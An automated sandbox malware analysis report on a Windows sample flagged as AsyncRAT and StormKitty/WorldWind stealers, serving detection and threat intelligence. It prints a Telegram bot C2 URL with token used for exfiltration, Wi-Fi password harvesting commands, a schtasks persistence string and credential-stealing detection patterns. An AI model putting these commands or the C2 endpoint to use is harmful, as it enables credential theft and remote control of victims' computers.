Edit tour

Windows Analysis Report
6mllsKaB2q.exe

Overview

General Information

Sample name:	6mllsKaB2q.exe renamed because original name is a hash value
Original sample name:	850fa36792359354c8b5cf86ebb2d6923aa64dece7fc5d555d90d156eaa0409e.exe
Analysis ID:	1587899
MD5:	a7649256fce8b15959edd1004df7781b
SHA1:	314294d940b110265283531e9e62b3dea6fb4506
SHA256:	850fa36792359354c8b5cf86ebb2d6923aa64dece7fc5d555d90d156eaa0409e
Tags:	AsyncRATexeuser-adrian__luca
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected WorldWind Stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Connects to a pastebin service (likely for C&C)

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies existing user documents (likely ransomware behavior)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

6mllsKaB2q.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\6mllsKaB2q.exe" MD5: A7649256FCE8B15959EDD1004DF7781B)

RegSvcs.exe (PID: 7216 cmdline: "C:\Users\user\Desktop\6mllsKaB2q.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cmd.exe (PID: 7472 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7520 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 7536 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7544 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7588 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7636 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 7652 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 1661, "from": {"id": 7935009733, "is_bot": true, "first_name": "jagaban", "username": "ghandisbot"}, "chat": {"id": 6779103906, "first_name": "David Bhatti", "username": "DaveeBhatti", "type": "private"}, "date": 1736532546, "document": {"file_name": "C_UsersuserAppDataLocal50258fbd039b7763b78e3cbf6b4d4ee3fron.zip", "mime_type": "application/zip", "file_id": "BQACAgQAAxkDAAIGfWeBYkIXtBp14waO18wGOfi7B6g2AAIgGgAC2swQUFKMyHFjnDXONgQ", "file_unique_id": "AgADIBoAAtrMEFA", "file_size": 188596}}}]}

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25463:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3497c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: 6mllsKaB2q.exe PID: 7068	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: 6mllsKaB2q.exe PID: 7068	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: 6mllsKaB2q.exe PID: 7068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6mllsKaB2q.exe PID: 7068	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 6mllsKaB2q.exe PID: 7068	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 6mllsKaB2q.exe PID: 7068	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2efe0d:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x6d6d4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: RegSvcs.exe PID: 7216	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x56b59:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x6c1f2:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
1.2.6mllsKaB2q.exe.dc0000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.6mllsKaB2q.exe.dc0000.1.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x10183:$sk01: LimerBoy/StormKitty 0x269ce:$sk01: LimerBoy/StormKitty 0x1ba79:$str01: set_sUsername 0x1bbff:$str02: set_sIsSecure 0x1bcdd:$str03: set_sExpMonth 0x1a12c:$str04: WritePasswords 0x1abcb:$str05: WriteCookies 0x1be8d:$str06: sChromiumPswPaths 0x1be9f:$str07: sGeckoBrowserPaths 0x22ca1:$str08: Username: {1} 0x23e49:$str08: Username: {1} 0x22cbd:$str09: Password: {2} 0x23e65:$str09: Password: {2} 0x24f7f:$str10: encrypted_key":"(.*?)"
1.2.6mllsKaB2q.exe.dc0000.1.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1d6c9:$str01: get_ActivatePong 0x1d5ee:$str02: get_SslClient 0x1d5d2:$str03: get_TcpClient 0x1d690:$str04: get_SendSync 0x1d670:$str05: get_IsConnected 0x1c131:$str06: set_UseShellExecute 0x27478:$str07: Pastebin 0x2146b:$str08: Select * from AntivirusProduct 0x27352:$str10: timeout 3 > NUL 0x27250:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x272e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
1.2.6mllsKaB2q.exe.dc0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
1.2.6mllsKaB2q.exe.dc0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
1.2.6mllsKaB2q.exe.dc0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
1.2.6mllsKaB2q.exe.dc0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
1.2.6mllsKaB2q.exe.dc0000.1.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
7.2.RegSvcs.exe.790000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.RegSvcs.exe.790000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
7.2.RegSvcs.exe.790000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.790000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.RegSvcs.exe.790000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.790000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
7.2.RegSvcs.exe.790000.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
7.2.RegSvcs.exe.790000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.RegSvcs.exe.790000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
7.2.RegSvcs.exe.790000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
7.2.RegSvcs.exe.790000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.RegSvcs.exe.790000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
Click to see the 30 entries

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\6mllsKaB2q.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 7216, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7472, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE StormKitty Data Exfil via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:09:03.360781+0100	2031009	1	Malware Command and Control Activity Detected	192.168.2.7	49788	149.154.167.220	443	TCP

ET MALWARE WorldWind Stealer Checkin via Telegram (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:09:03.360781+0100	2044766	1	A Network Trojan was detected	192.168.2.7	49788	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:09:04.353260+0100	2803305	3	Unknown Traffic	192.168.2.7	49794	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:09:05.417812+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49802	149.154.167.220	443	TCP
